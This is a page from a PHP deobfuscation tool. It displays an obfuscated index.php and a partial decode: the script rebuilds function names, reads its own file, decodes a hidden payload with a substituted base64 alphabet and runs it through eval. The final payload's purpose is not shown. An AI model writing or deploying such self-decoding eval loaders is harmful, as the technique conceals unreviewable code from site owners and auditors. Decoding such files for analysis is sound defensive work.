Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$G..

Decoded Output download

$O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');$GLOBALS['O0O00OO00']($O000O0O00,0x505);$OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x1a8),'hlYLUBTsHyq1C4WuNpFKi5kMwR0em/zQJ8bDrcZOSXaGjPd6fn7+voI3g92AxVtE=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);

Did this file decode correctly?

Original Code

<?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x1afc;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUwNSk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnaGxZTFVCVHNIeXExQzRXdU5wRktpNWtNd1IwZW0velFKOGJEcmNaT1NYYUdqUGQ2Zm43K3ZvSTNnOTJBeFZ0RT0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>Qx|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TpG

Function Calls

urldecode 1
base64_decode 1

Variables

$O0O000O00 fgets
$O0O00OO00 fread
$OO00O0000 6908
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 c7a567d72533a4631e2dfa4895b102e4
Eval Count 1
Decode Time 134 ms